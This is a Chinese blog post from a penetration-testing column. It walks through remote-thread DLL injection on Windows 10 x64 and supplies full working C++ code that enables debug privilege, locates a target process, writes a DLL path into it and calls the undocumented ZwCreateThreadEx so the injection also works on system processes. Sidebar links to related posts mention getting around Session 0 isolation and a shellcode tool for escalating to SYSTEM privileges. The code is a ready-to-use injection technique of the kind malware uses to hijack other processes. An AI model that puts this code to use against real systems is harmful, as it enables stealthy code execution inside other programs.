Win10_X64远线程注入dll(非CreateRemoteThread)

最新推荐文章于 2024-06-05 06:59:46 发布
最新推荐文章于 2024-06-05 06:59:46 发布
阅读量3.1k 收藏 19
点赞数 4
分类专栏: 渗透 C/C++ 小菜鸡 文章标签: c++ 内核 多线程 渗透
1
本文链接:https://blog.csdn.net/weixin_43815930/article/details/108838963
版权
小菜鸡 同时被 3 个专栏收录
24 篇文章 0 订阅
订阅专栏
C/C++
23 篇文章 3 订阅
订阅专栏
渗透
22 篇文章 1 订阅
订阅专栏

谈到远线程注入,首先肯定会想到使用CreateRemoteThread,但这个API无法对系统进程进行注入,而且根据我个人的验证发现这个函数在win10下也无法正常将dll注入进记事本进程(淦!)。好在在我的不懈努力的百度、google下发现了另一种思路,那就是使用ZwCreateThread这个内核API,CreateRemoteThread在底层也调用了这个API,CreateRemoteThread底层会调用内核函数ZwCreateThreadEx,而系统调用此函数时,如果发现是系统进程,会把函数的第七个参数CreateSuspended设置为1,导致线程创建完成后会一直处于挂起状态,无法恢复运行,导致注入失败。所以我们必须手动调用ZwCreateThread这一内核函数,将第七个参数设置为0即可。
想要对某个进程进行注入,除了创建线程外,还要记得先提升进程权限
代码:

BOOL GetDebugPrivilege(
_In_ LPCSTR lPcstr,
_Inout_ DWORD* backCode
)
{
	HANDLE Token = NULL;
	LUID luid = { 0 };
	TOKEN_PRIVILEGES Token_privileges = { 0 };
	//内存初始化为zero
	memset(&luid, 0x00, sizeof(luid));
	memset(&Token_privileges, 0x00, sizeof(Token_privileges));

	//打开进程令牌
	if (!OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY | TOKEN_ADJUST_PRIVILEGES, &Token))
	{
		*backCode = 0x01;
		return FALSE;
	}

	//获取特权luid
	if (!LookupPrivilegeValue(NULL,lPcstr,&luid))
	{
		*backCode = 0x02;
		return FALSE;
	}

	//设定结构体luid与特权
	Token_privileges.PrivilegeCount = 1;
	Token_privileges.Privileges[0].Luid = luid;
	Token_privileges.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;

	//修改进程特权
	if (!AdjustTokenPrivileges(Token, FALSE, &Token_privileges, sizeof(TOKEN_PRIVILEGES), NULL, NULL))
	{
		*backCode = 0x03;
		return FALSE;
	}
	*backCode = 0x00;
	return TRUE;
}

OpenProcessToken函数用于打开进程的令牌
LookupPrivilegeValue负责获取到要用权限的luid,此处获取进程调试权限
AdjustTokenPrivileges负责修改进程的权限
TOKEN_PRIVILEGES结构体包含一组权限信息的访问令牌,此处用来保存要修改的权限信息内容,供之后的AdjustTokenPrivileges函数使用

  • PrivilegeCount应设置为Privileges元素个数
  • Privileges是指定的LUID_AND_ATTRIBUTES结构体数组,每个LUID_AND_ATTRIBUTES结构体都包含luid以及特权属性

还有一个根据进程名称获取pid的函数,那个函数的基本思路为通过进程快照来获取进程名称当找到指定进程名称就将其pid拿出来即可。

int GetProcessPid(
	_In_ const char* ProcessName,
	_Inout_ DWORD* backCode
)
{
	PROCESSENTRY32 P32 = { 0 };
	HANDLE H32 = NULL;
	//内存初始化为zeor
	memset(&P32, 0X00, sizeof(P32));
	//创建快照
	H32 = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
	P32.dwSize = sizeof(P32);
	if (H32 == NULL)
	{
		*backCode = 0x01;
		return -1;
	}
	//开始循环遍历进程
	BOOL ret = Process32First(H32, &P32);
	while (ret)
	{
		//发现指定进程存在
		if (!strcmp(P32.szExeFile, ProcessName))
		{
			*backCode = 0x00;
			return P32.th32ProcessID;
		}
		ret = Process32Next(H32, &P32);
	}
	*backCode = 0x01;
	return -1;
}

接下来说程序的主函数部分,在进行注入前首先肯定要知道要注入的动态链接库的绝对地址(相对地址可能会出现不可知错误),其次就要知道要被注入的进程pid,在拿到这两项内容后,

  1. 先要提升我们的进程权限,让其拥有进程调试权限。
  2. 然后使用OpenProcess函数来打开要被注入的进程。
  3. 在使用VirtualAllocEx来在指定进程(被注入的进程)中申请创建一块内存用于存储要注入的dll库绝对路径。
  4. 之后使用WriteProcessMemory来将dll的路径写入这块内存区域。
  5. 然后使用GetModuleHandle获取kernel32.dll库的模块句柄,再调用GetProcAddress来获取LoadLibrary函数的地址。
  6. 然后使用LoadLibrary(非刚才获取到的)将ntdll.dll库加载进来以便我们获取内核函数ZwCreateThread。
  7. 然后要注意我们需要定义一个函数指针用于将刚刚从ntdll库中获取到的ZwCreateThread函数的地址存放进去,之后直接调用这个函数指针即可。
  8. 使用刚刚已经存放了ZwCreateThread地址的函数指针去在要被注入的进程中创建一个新的线程,在这个线程中调用刚刚从kernel32.dll库中获取的LoadLibray函数去加载我们已经获取到绝对路径的要注入的dll库路径字符串。
  9. 最后记得将申请的内存创建的句柄,该释放的释放,该关闭的关闭。
int main(int argv, char* argc[])
{
	//对必要的变量进行声明以及初始化
	DWORD backCode = 0;
	HANDLE hProcess = NULL;
	LPVOID Buff = NULL;
	LPVOID LoadLibraryBase = NULL;
	char DllPath[] = "D:\\cp\\pk\\x64\\Release\\pk.dll";
	DWORD DllPathLen = strlen(DllPath) + 1;
	HMODULE Ntdll = NULL;
	SIZE_T write_len = 0;
	DWORD dwStatus = 0;
	HANDLE hRemoteThread = NULL;

	//通过进程名获取pid
	int pid = GetProcessPid("notepad.exe", &backCode);
	if (pid == -1)
	{
		puts("pid get error");
		return 0;
	}

	//提升进程特权,获得调试权限
	if (!GetDebugPrivilege(SE_DEBUG_NAME, &backCode))
	{
		puts("DBG privilege error");
		printf(" %d", backCode);
		return 0;
	}

	//打开要被注入的进程
	if ((hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid))== NULL)
	{
		puts("process open erro");
		return 0;
	}

	//在要被注入的进程中创建内存,用于存放注入dll的路径
	Buff = VirtualAllocEx(hProcess, NULL, DllPathLen, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
	if (Buff==NULL)
	{
		puts("Buff alloc error");
		return 0;
	}

	//将dll路径写入刚刚创建的内存中
	WriteProcessMemory(hProcess, Buff, DllPath, DllPathLen, &write_len);
	if(DllPathLen != write_len)
	{
		puts("write error");
		return 0;
	}

	//从kernel32.dll中获取LoadLibrary函数
	LoadLibraryBase = GetProcAddress(GetModuleHandle("kernel32.dll"), "LoadLibraryA");
	if (LoadLibraryBase == NULL)
	{
		puts("kernel32 get error");
		return 0;
	}

	//加载ntdll.dll并从中获取内核函数ZwCreateThread,并使用函数指针指向此函数
	Ntdll = LoadLibrary("ntdll.dll");
	pZwCreateThreadEx ZwCreateThreadEx = 
		(pZwCreateThreadEx)GetProcAddress(Ntdll, "ZwCreateThreadEx");
	if (ZwCreateThreadEx == NULL)
	{
		puts("func get error");
		return 0;
	}

	//执行ZwCreateThread函数,在指定进程中创建线程加载要被注入的dll
	dwStatus = ZwCreateThreadEx(
		&hRemoteThread,
		PROCESS_ALL_ACCESS,
		NULL,
		hProcess,
		(LPTHREAD_START_ROUTINE)LoadLibraryBase,
		Buff,
		0, 0, 0, 0,
		NULL
	);
	if (hRemoteThread == NULL)
	{
		puts("zwcreatethread fun error");
		return 0;
	}

	//释放不需要的变量以及内存
	CloseHandle(hProcess);
	FreeModule(Ntdll);
	ExitProcess(0);
	return 0;
}

要包含的头文件:

  • string.h
  • stdlib.h
  • stdio.h
  • Windows.h
  • string.h
  • TlHelp32.h

完整项目源码地址:
github:Pluviophile-BT

Anansi_safe
关注
专栏目录
Windows黑客编程——远程线程注入(2)
Think88666的博客
03-27 1399
本篇采用的技术与前一篇无异,唯一的区别是调用了更底层的API——ZwCreateThreadEx,与CreateRemoteThread相比,该API除了能注入普通进程外,还能注入系统服务进程,实际上CreateRemoteThread底层也是通过ZwCreateThreadEx来实现了,不过该API是微软未公布的,所以不同版本操作系统或编写32位与64位程序,该函数的原型不一定相同。 废话不多说,参考第一篇博文,直接上代码: //定义32位函数指针 typedef DWORD(WINAPI *typ
Win10远程线程注入DLL源码.zip
11-30
原理跟32位进程注入没太大区别,首先获取ntdll下的RtlInitUnicodeString,LdrLoadDll,NtCreateThreadEx地址,最后分配内存写入Code数据创建远程线程跑起来!
利用 ZwCreateThreadEx 注入 DLL
溡漪幽博客
10-09 766
PROCESSENTRY32W 结构体中的 cntThreads 包含进程的线程计数信息,崩溃的进程没有主线程,于是,可以加上这个条件来过滤。我们可以采取很多方法来注入 DLL 比如较新的早鸟(EarlyBird)技术,就是利用 APC 配合未公开函数进行劫持注入。需要注意的是我们可能遇到内存中已经崩溃的进程,这种时候会导致注入器不断尝试注入过程,但始终失败。我们常常使用进程名作为特征,遍历进程的 PID 以及句柄,然后执行注入过程
注入技术
qq_41071646的博客
01-08 977
本博客代码 均来自 windows黑客编程技术详解 这章我还是看了好久 而且我在windows10下成功运行但是没有弹出来窗口 不知道怎么回事   但是注入是成功的   那么我还是看了看这章的内容 全局钩子的注入 其实也就是利用了微软提供的钩子函数 这里 的函数是 setwindowshookex  这个函数 第一个参数是 钩子类型 第二个是 钩子程序的指针  也就是我们提供钩子函数的地方...
DLL注入工具:利用 ZwCreateThreadEx 注入 DLL
最新发布
weixin_41245990的博客
06-05 734
x86-64:x86-32:DWORD dw1,DWORD dw2,其中,lpStartAddress 支持提供内存地址用于执行 Payload 函数,lpParameter 传入结构体指针,用于在回调中使用。
dll.rar_DLL注入 c_dll注入_win7 注入DLL
09-19
DLL注入的基本原理是通过调用Windows API函数`CreateRemoteThread`在一个目标进程中创建一个新的线程,并让这个线程执行我们提供的DLL中的特定函数。首先,我们需要获取目标进程的句柄,然后在目标进程中分配内存来...
DLLzhuru.zip_dllzhuru_win7 dll_win7 注入DLL
09-14
在这个"DLLzhuru.zip_dllzhuru_win7 dll_win7 注入DLL"的压缩包中,我们似乎有一个关于DLL注入的实例,适用于Windows XP、Windows 2000以及Windows 7系统。 首先,我们要理解DLL的本质。DLL文件是包含可由多个程序...
dllzhuru.rar_dll 注入_dll远程注入_vc 远程注入_远程注入
09-24
DLL注入技术详解——基于VC的远程注入实践》 DLL(Dynamic Link Library)注入是一种常见的系统编程技术,常用于扩展程序功能、调试、监控或恶意攻击。本篇文章将深入探讨DLL注入的基本原理,并通过VC++实例,...
dll远程线程注入(支持64bit win7)
07-20
标题 "dll远程线程注入(支持64bit win7)" 描述了一种技术,用于在其他进程中动态加载和执行DLL(动态链接库)代码。这种方法通常被用于调试、监控、自动化测试或恶意软件中。这里特别指出它适用于64位Windows 7...
编写Win32控制台程序 注入带窗口的DLL.rar_dll注入_mfc.dll_带窗口的dll_注入_窗口 DLL
09-20
2. **DLL注入**:DLL注入技术通常涉及使用CreateRemoteThread或VirtualAllocEx等系统API,将DLL的路径写入目标进程的内存,然后在目标进程中创建一个新线程,使其执行DLL的导出函数。这种方法常用于调试、监控、性能...
易语言x86/x64注入驱动 源码
03-15
theft是个DLL,要在驱动加载前,先注入到目标进程中,并通过窗口卡目标进程一下,挂载好钩子 这个注入刚好能实现提前注入 注入原理:通过CreateProcessW拦截正在启动的目标进程,先行注入DLL 注意:只要不关机,不卸载,注入DLL会一直留存在系统内存中,再次启动目标进程或启动多个目标进程,都不需要再次注入
DLL注入:突破 SESSION 0隔离的线程注入
GeniusLS的博客
08-11 471
本人学习《Windows编程技术》所做的学习笔记 简介:由于系统进程有着SESSION 0 的会话隔离机制,我们普通的线程注入无法行得通,于是我们要调用更加底层的函数来帮我们实现隔离突破 大致思路:调用CreateRemoteThread的爸爸 ZwCreateThreadEx来进行隔离突破!! 1,何为会话隔离? 历史:在内核6.0版本后引入了会话隔离机制 概述:在创建一个进程之后不会马上就运行,而是先挂起检查是否在同一会话层再决定是否执行。 2,ZwCreateThreadE...
进程创建监控
zzmzzff的博客
03-28 690
上次讲了下进程保护原理,这次讲一下进程监控。监视进程创建,也就是监视EXE程序启动,就要hook掉创建进程的API,创建进程的API有ntdll!ZwCreateProcessEx、ZwCreateSection、ZwCreateThread等,kernel32里有CreateProcessA(W)和CreateProcessInternalA(W),hook ZW函数比较麻烦,因为那时进...
Dll注入:X86/X64 远程线程CreateRemoteThread 注入
aijuzhou1959的博客
03-09 321
线程注入原理是利用Windows 系统中CreateRemoteThread()这个API,其中第4个参数是准备运行的线程,我们可以将LoadLibrary()填入其中,这样就可以执行远程进程中的LoadLibrary()函数,进而将我们自己准备的DLL加载到远程进程空间中执行。 函数原型: HANDLE WINAPI CreateRemoteThread( ...
【安全技术】关于几种dll注入方式的学习
dzqxwzoe的博客
01-06 1233
举个RING权限的最简单的例子:一个停止响应的应用程式,它运行在比RING0更低的指令环上,你不必大费周章的想着如何使系统回复运作,这期间,只需要启动任务管理器便能轻松终止它,因为它运行在比程式更低的RING0指令环中,拥有更高的权限,可以直接影响到RING0以上运行的程序,当然有利就有弊,RING保证了系统稳定运行的同时,也产生了一些十分麻烦的问题。在线程下一次被调度的时候,就会执行APC函数,APC有两种形式,由系统产生的APC称为内核模式APC,由应用程序产生的APC被称为用户模式APC。
win10_x64下shellcode提权工具(SYSTEM权限)
Anansi的博客
11-22 3628
之前写过一篇线程注入与一篇shellcode编写的文章: Win10_X64线程注入dll(CreateRemoteThread) Windows 10_X64环境shellcode编写 上一次是通过线程注入,将指定的dll模块加载进我们指定的进程,这一次将我们写好的shellcode注入进指定的进程,从而执行任意代码。 首先我们要清楚如何获取一个具有system权限的cmd,想要获取一个具有system权限的cmd,首先这个cmd得是一个具有system权限进程的子进程,windows下具有sys
远程线程注入之突破Session0隔离会话
xf555er的博客
06-12 1279
当我们使用远程线程注入dll注入至系统服务进程中往往会失败,这是因为大多数系统服务都是在Session0中运行的 "Session 0"是Windows操作系统中的一个特殊的会话,专门用于运行系统服务和其他在用户登录之前就需要运行的程序。从Windows Vista和Windows Server 2008开始,为了提高安全性,Windows将用户和系统服务分隔在不同的会话中。具体来说,所有的服务和系统任务都在Session 0中运行,而所有用户交互任务都在其他会话中运行
使用Native API 创建进程
misterliwei的专栏
08-18 5477
<!--v/:* {behavior:url(#default#VML);}o/:* {behavior:url(#default#VML);}w/:* {behavior:url(#default#VML);}.shape {behavior:url(#default#VML);}--> Normal 0 7.8 磅 0 2
突破SESSION 0隔离的线程注入
yeanhoo的博客
09-24 643
突破SESSION 0隔离的线程注入 与传统的CreateRemoteThread函数实现的线程注入DLL的唯一区别在于,突破SESSION 0线程注 入技术是使用比CreateRemoteThread函数更为底层的ZwCreateThreadEx函数来创建线程,而具体的线 程注入原理是相同的。 #include<stdio.h> #include<windows.h> #include<Tlhelp32.h> #define NAME "wininit.exe
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值